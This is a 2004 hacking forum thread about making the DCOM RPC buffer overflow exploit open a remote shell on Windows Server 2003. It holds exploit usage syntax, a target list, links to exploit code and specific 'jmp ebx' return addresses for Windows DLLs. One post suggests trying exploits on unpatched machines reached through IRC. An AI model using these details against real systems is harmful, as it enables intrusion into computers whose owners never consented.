Forums: Old, But A Goodie - Forums

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Old, But A Goodie DCOM

#1 User is offline   EXPLOiTED 

  • Sergeant
  • Icon
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 09 January 2004 - 12:59 PM

hey, just started looking into exploits and want to learn more about them and the new ones that come out rapidly. I was testing some within my home network. i started with dcom which i used the compiled cygwin dll version. (/dcom <Target ID> <Target IP>). Trying it on my 2003 machine it got in. Therefore causing the rpc service toshutdown\start, shutdown\start, and the same with the pc. I was expecting a remote shell to spawn. Did i do something wrong?
0

#2 User is offline   vnet576 

  • Specialist
  • Icon
  • Group: Members
  • Posts: 1,000
  • Joined: 01-August 03

Posted 09 January 2004 - 01:02 PM

You need to find an offset for win2k3. The default dcom exploit only has universal offsets for 2k and xp.
0

#3 User is offline   EXPLOiTED 

  • Sergeant
  • Icon
  • Group: Members
  • Posts: 236
  • Joined: 23-October 03

Posted 09 January 2004 - 02:19 PM

oh i see. Yea i saw something about offsets. Is there a file to figure it out. isnt it one of the dlls in the OS.
0

#4 User is offline   icenix 

  • Private First Class
  • Icon
  • Group: Members
  • Posts: 91
  • Joined: 05-January 04

Post icon  Posted 10 January 2004 - 04:40 AM

new ones?
dont worry dude.. DCOM and RPC exploits are soo common...
the easiest way is to get yourself an IRC Client and log onto dal.net ...
its like a breeding ground for script kiddies and unpached M$ boxes...
perfect for testing..... not that im enouraging it...

ive got you acouple of links that you might be interested in:

http://www.k-otik.co.../07.30.dcom48.c
an exploit (very messy)

http://www.ntisys.co...M-exploits.html
this is a good link if your wanting to find the most common windows exploits (DCOM / RPC)

http://www.securitea...5WP0B20B5C.html
a better exploit

http://www.securitea...6Q0042K8KA.html
another exploit

my suggestions are if your looking for exploits..check out securiteam.com
its full of usefull information
its my 1st stop...

ch33rs
icenix
0

#5 User is offline   r3L4x 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 168
  • Joined: 13-August 03

Posted 10 January 2004 - 08:50 PM

hmm, i can never get those things to work.
0

#6 User is offline   Flowby 

  • Sergeant
  • Icon
  • Group: Members
  • Posts: 205
  • Joined: 06-September 03

Posted 11 January 2004 - 09:48 AM

Hi Relax!!!LOL ;)
What problem do youz have?
0

#7 User is offline   JaX 

  • Private
  • Icon
  • Group: Members
  • Posts: 10
  • Joined: 11-January 04

Posted 11 January 2004 - 09:53 AM

;) there is a dcom with universal offset out there
0

#8 User is offline   pita 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 153
  • Joined: 15-September 03

Posted 27 January 2004 - 06:58 AM

maybe take a look at this nice article:
http://www.nextgenss...-protection.pdf
0

#9 Guest_Dinos_*

  • Group: Guests

Post icon  Posted 27 January 2004 - 11:15 AM

I did that some time ago and it's quite nice and working. If somebody is interested just tell me where to upload the file

$new/win3
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Rewritten adding generic hosts - Dinos
- Usage: new/win3 <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)
- 7 Windows 2000 (Generic)
- 8 Windows XP (Generic)

Regards,
Dinos
0

#10 User is offline   pita 

  • Corporal
  • Icon
  • Group: Members
  • Posts: 153
  • Joined: 15-September 03

Posted 27 January 2004 - 11:49 AM

i think that u dont understand he want to exploit his windows 2003 server so ur "magical" ret for 2k and xp will simply not work for 2k3...

althought if u see the metasploit exploit for dcom
( http://www.metasploi...m/releases.html )

they say that they use jmp ebx so i think in a primary view that u have to search for a jmp ebx

value for 2003 server (us) are:

-=[ ntdll.dll ]=--
jmp ebx 0x77fb5d83

--=[ kernel32.dll ]=--
jmp ebx 0x77ece3ca
jmp ebx 0x77eda8e3

-=[ msvcrt.dll ]=--

jmp ebx 0x77ba8ef8
jmp ebx 0x77ba96d5
jmp ebx 0x77bb31b1

so maybe u will need to use one of them in place of u ret and that will spawn the shell but i dont have 2k3 so i cant help u more than this :)
0
Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users

  • Share



Our Sponsors:


SwiftLayer Affiliate Web Hosting